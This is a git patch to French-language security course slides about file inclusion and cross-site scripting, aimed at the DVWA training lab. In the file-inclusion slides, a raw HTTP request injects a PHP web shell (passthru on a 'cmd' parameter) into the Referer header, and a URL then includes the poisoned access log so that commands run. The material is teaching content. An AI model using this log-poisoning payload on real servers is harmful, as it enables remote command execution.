From a20d62e03cf61738df7c91bb2d39c54fb4edef04 Mon Sep 17 00:00:00 2001
From: Vincent Mazenod <vmazenod@gmail.com>
Date: Mon, 19 Oct 2020 18:53:57 +0200
Subject: [PATCH] fix cours

---
 content/slides/1337/md/fi.md  | 12 ++++--------
 content/slides/1337/md/xss.md | 11 ++++++-----
 2 files changed, 10 insertions(+), 13 deletions(-)

diff --git a/content/slides/1337/md/fi.md b/content/slides/1337/md/fi.md
index 07280f2..b79ca8f 100644
--- a/content/slides/1337/md/fi.md
+++ b/content/slides/1337/md/fi.md
@@ -178,9 +178,7 @@ CustomLog /home/mazenovi/logs/dvwa-access.log combined
 
 * l'utilisateur lié au thread apache a accès en lecture à ce répertoire
 
-<small>
-[http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log](http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.lo)
-</small>
+[http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log](http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log)
 
 * les logs sont affichés
 
@@ -201,15 +199,13 @@ $ nc dv.wa 80
 * Entrer manuellement les paramètres suivant
 
 ```http
-GET /<?php echo passthru($_GET['cmd']); ?> HTTP/1.1
+GET / HTTP/1.1
 Host: dv.wa
-Referer: <?php echo passthru($_GET['cmd2']); ?>
-User-Agent: <?php echo passthru($_GET['cmd3']); ?>
+Referer: <?php echo passthru($_GET['cmd']); ?>
+User-Agent: 1337-webbrowser
 ```
 
-<small>
 [http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log&cmd=ls](http://dv.wa/vulnerabilities/fi/?page=/home/mazenovi/logs/dvwa-access.log&cmd=ls)
-</small>
 
 attendre le log rotate en cas d'échec
 
diff --git a/content/slides/1337/md/xss.md b/content/slides/1337/md/xss.md
index 9465cf1..86dfe54 100644
--- a/content/slides/1337/md/xss.md
+++ b/content/slides/1337/md/xss.md
@@ -8,7 +8,8 @@
 * Affichage de données utilisateur sans validation ou échappement
   * par oubli du développeur
   * par les messages d'erreurs renvoyés par le langage
-    * tentative d'injection de code interprétable par le navigateur de la cible
+    
+* tentative d'injection de code interprétable par le navigateur de la cible
 
 
 ### <i class="fa fa-user-secret"></i> Que peut on faire?
@@ -67,11 +68,11 @@ Note:
 
 ![Bob](images/xss/XSS-bob.png "Bob")  ![Fleche](images/xss/XSS-fleche.png "Fleche") ![Alice](images/xss/XSS-alice1.png "Alice")
 
-3.Bob envoie l'url du XSS à Alice en l'incitant à cliquer sur un lien forgé **XSS réfléchie**
+3.Bob envoie l'url du XSS à Alice en l'incitant à cliquer sur un lien forgé (**XSS réfléchie**)
 
 ou
 
-3.attend simplement qu'elle se connecte une page compromise **XSS stockée**
+3.attend simplement qu'elle se connecte à une page compromise (**XSS stockée**)
 
 Note:
 - test du XSS souvent alert ... méthode plus discrète notamment pour XSS stored
@@ -82,11 +83,11 @@ Note:
 
 ![Alice](images/xss/XSS-alice2.png "Alice")  ![Fleche](images/xss/XSS-fleche.png "Fleche") ![Site piégé](images/xss/XSS-sitepiege.png "Site piégé") ![Serveur victime](images/xss/XSS-serveurvictime.png "Serveur victime")
 
-4.Alice clique sur le lien forgé **XSS réfléchie**
+4.Alice clique sur le lien forgé (**XSS réfléchie**)
 
 ou
 
-4.Alice consulte la page compromise et pense avoir à faire à l'originale **XSS stockée**
+4.Alice consulte la page compromise et pense avoir à faire à l'originale (**XSS stockée**)
 
 
 ## XSS
-- 
GitLab